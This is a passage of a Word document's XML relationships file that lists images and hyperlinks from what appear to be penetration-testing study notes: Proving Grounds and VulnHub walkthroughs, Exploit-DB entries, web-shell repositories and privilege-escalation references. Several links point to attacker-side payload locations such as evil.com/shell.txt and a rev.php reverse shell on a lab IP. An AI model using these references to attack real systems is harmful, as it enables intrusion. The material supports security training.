Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://evil.com/shell.txt" TargetMode="External"/><Relationship Id="rId1317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@barrattjack89/pg-practice-walla-walkthrough-2e0c33eb284b" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image458.png"/><Relationship Id="rId1318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/pc-proving-grounds-practice-walkthrough-7619983c7d63" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image418.png"/><Relationship Id="rId1319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50983" TargetMode="External"/><Relationship Id="rId729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.45.232/rev.php" TargetMode="External"/><Relationship Id="rId728" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image471.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.png"/><Relationship Id="rId723" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image306.png"/><Relationship Id="rId965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId722" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/41154" TargetMode="External"/><Relationship Id="rId964" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/wordpress-seo/" TargetMode="External"/><Relationship Id="rId721" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image555.png"/><Relationship Id="rId963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/elementor/" TargetMode="External"/><Relationship Id="rId720" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image305.png"/><Relationship Id="rId962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/duplicator/" TargetMode="External"/><Relationship Id="rId727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image472.png"/><Relationship Id="rId969" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId726" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image292.png"/><Relationship Id="rId968" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image220.png"/><Relationship Id="rId725" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId967" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/wordpress-reverse-shell/" TargetMode="External"/><Relationship Id="rId724" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image214.png"/><Relationship Id="rId966" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image296.png"/><Relationship Id="rId961" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/contact-form-7/" TargetMode="External"/><Relationship Id="rId960" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/classic-editor/" TargetMode="External"/><Relationship Id="rId1310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/payday" TargetMode="External"/><Relationship Id="rId1311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/snookums-proving-ground-practice-walkthrough-0a8937c6aa2f" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId1301" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/vulnerability/7b412469-cc03-4899-b397-38580ced5618/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image428.png"/><Relationship Id="rId1302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@huwanyu94/proving-grounds-play-sosimple-walkthrough-18bc36ab859e" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId1303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-loly-d8724b4466a3" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image450.png"/><Relationship Id="rId1304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45010" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image243.png"/><Relationship Id="rId1305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-tre-92-100-9b73ef8d0918" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image435.png"/><Relationship Id="rId1306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://johnjhacking.com/blog/oscp-reborn-2023/" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/filesystem.configuration.php" TargetMode="External"/><Relationship Id="rId1307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50616" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/filesystem.configuration.php" TargetMode="External"/><Relationship Id="rId1308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-payday-639f5128b0ca" TargetMode="External"/><Relationship Id="rId1309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c" TargetMode="External"/><Relationship Id="rId719" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image375.png"/><Relationship Id="rId718" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.49.112/passwd" TargetMode="External"/><Relationship Id="rId717" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.49.112/passwd" TargetMode="External"/><Relationship Id="rId959" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wordpress.org/plugins/akismet/" TargetMode="External"/><Relationship Id="rId712" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/php/#suid" TargetMode="External"/><Relationship Id="rId954" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image310.png"/><Relationship Id="rId711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/astronaut-proving-grounds-09c2cf63de97" TargetMode="External"/><Relationship Id="rId953" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image515.png"/><Relationship Id="rId710" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/sorcerer" TargetMode="External"/><Relationship Id="rId952" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId951" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId716" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId958" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image205.png"/><Relationship Id="rId715" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId957" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/statistics" TargetMode="External"/><Relationship Id="rId714" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@malwarejoe/xposedapi-offsec-proving-grounds-lab-write-up-3848be2c61d3" TargetMode="External"/><Relationship Id="rId956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpscan.com/statistics" TargetMode="External"/><Relationship Id="rId713" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image353.png"/><Relationship Id="rId955" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://wordpwn.py" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-slort-2294f5ddde5b" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image295.png"/><Relationship Id="rId950" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId1300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://me0w.medium.com/wpwn-walkthrough-offensive-security-proving-grounds-play-boxes-a824d3519849" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.echo.php" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image202.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works" TargetMode="External"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@adamforsythebartlett/scrutiny-walkthrough-proving-grounds-practice-01737dd96583" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image245.png"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://host.name/FUZZ" TargetMode="External"/><Relationship Id="rId589" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.echo.php" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://host.name/FUZZ" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.system.php" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer" TargetMode="External"/><Relationship Id="rId1170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image411.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image369.png"/><Relationship Id="rId1171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image208.png"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/dc-4-vulnhub-98d97fb0fea4" TargetMode="External"/><Relationship Id="rId583" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image328.png"/><Relationship Id="rId1172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/bbscute-write-up-walkthrough-offsec-provinggrounds-vulnhub-05bad5754e72" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.png"/><Relationship Id="rId582" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId1173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@d3mi/vegeta1-offsec-proving-grounds-acd77f1b5b61" TargetMode="External"/><Relationship Id="rId581" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/meetcyber/proving-grounds-solstice-walkthrough-2c088906ea74" TargetMode="External"/><Relationship Id="rId1174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image483.png"/><Relationship Id="rId580" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId1175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image303.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/function.system.php" TargetMode="External"/><Relationship Id="rId1176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image415.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId1177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image513.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control" TargetMode="External"/><Relationship Id="rId343" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/evilbox-one-vulnhub-walkthrough-e60d723c7639" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent" TargetMode="External"/><Relationship Id="rId1178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image233.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image171.png"/><Relationship Id="rId342" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image461.png"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent" TargetMode="External"/><Relationship Id="rId1179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image299.png"/><Relationship Id="rId1169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@zeroDaykt/election1-proving-grounds-play-walkthrough-2c35b07844ec" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image320.png"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image561.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0xrave/cockpit-proving-ground-practice-walkthrough-c95930e9523d" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image359.png"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software-sinner.medium.com/offensive-security-proving-grounds-ha-natraj-e11c8053d7cb" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image204.png"/><Relationship Id="rId1160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-internal-e5098dd29793" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/TheBinitGhimire/Web-Shells" TargetMode="External"/><Relationship Id="rId572" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Percent-encoding" TargetMode="External"/><Relationship Id="rId1161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-24-proving-grounds-internal-5e0b8d368c62" TargetMode="External"/><Relationship Id="rId571" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_application_firewall" TargetMode="External"/><Relationship Id="rId1162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-kevin-walkthrough-c6f85d5bc0b9" TargetMode="External"/><Relationship Id="rId570" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Web_application_firewall" TargetMode="External"/><Relationship Id="rId1163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-6-proving-grounds-kevin-da7ff42e659a" TargetMode="External"/><Relationship Id="rId1164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://routezero.security/2024/11/29/proving-grounds-practice-osaka-walkthrough/" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/blogger-walkthrough-a6d064b8608e" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image516.png"/><Relationship Id="rId1165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://beautifier.io/" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=xZd1JWmLGLk" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-paydaywalkthrough-1d0bddff70f1" TargetMode="External"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=xZd1JWmLGLk" TargetMode="External"/><Relationship Id="rId574" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/tags/ref_urlencode.asp" TargetMode="External"/><Relationship Id="rId1167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gchq.github.io/CyberChef/" TargetMode="External"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/proving-grounds-practise-active-directory-box-access-79b1fe662f4d" TargetMode="External"/><Relationship Id="rId573" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Percent-encoding" TargetMode="External"/><Relationship Id="rId1168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gchq.github.io/CyberChef/" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image507.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/NT_LAN_Manager" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/NT_LAN_Manager" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/LAN_Manager" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/LAN_Manager" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.png"/><Relationship Id="rId1190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@z6157881/cybersploit-1-vulnhub-walkthrough-8537c7b71dcf" TargetMode="External"/><Relationship Id="rId1191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@rzashirinov38/driftingblues-6-vulnhub-walkthrough-8db6ecdb3b46" TargetMode="External"/><Relationship Id="rId1192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/03/26/katana-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId1193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/pyexp-walkthrough-online-b01cf16a2ca5" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/fileless-uac-bypass-uses-windows-backup-and-restore-utility/124579/" TargetMode="External"/><Relationship Id="rId363" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId1194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asecuritysite.com/tokens/ferdecode" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://threatpost.com/fileless-uac-bypass-uses-windows-backup-and-restore-utility/124579/" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jserna4510/dc-2-walkthrough-682ae78c7ed6" TargetMode="External"/><Relationship Id="rId1195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://asecuritysite.com/tokens/ferdecode" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/glasgow-smile-1-proving-groundswalkthrough-521b2fee1317" TargetMode="External"/><Relationship Id="rId1196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberarri.com/2024/06/15/sumo-pg-play-writeup/" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ipcrawler.io/" TargetMode="External"/><Relationship Id="rId1197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image279.png"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId1198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ypopova3/sunsetdecoy-offsec-3734783dbfda" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image373.png"/><Relationship Id="rId1199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osintteam.blog/proving-grounds-sunsetdecoy-walkthrough-28108bcaecd9" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image558.png"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@mahdi_78420/nagoya-walkthrough-practice-tj-3259e8ec1832" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image381.png"/><Relationship Id="rId364" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@anushka18599/offsec-proving-grounds-walkthrough-monster-774a871c6ad7" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/debug-programs" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/debug-programs" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image246.png"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image533.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image313.png"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/unode/firefox_decrypt" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/security-cheatsheet/metasploit-cheat-sheet" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image541.png"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image498.png"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-stapler-464f2a8aa6dc" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/main/NtObjectManager/NtTokenFunctions.ps1" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image497.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 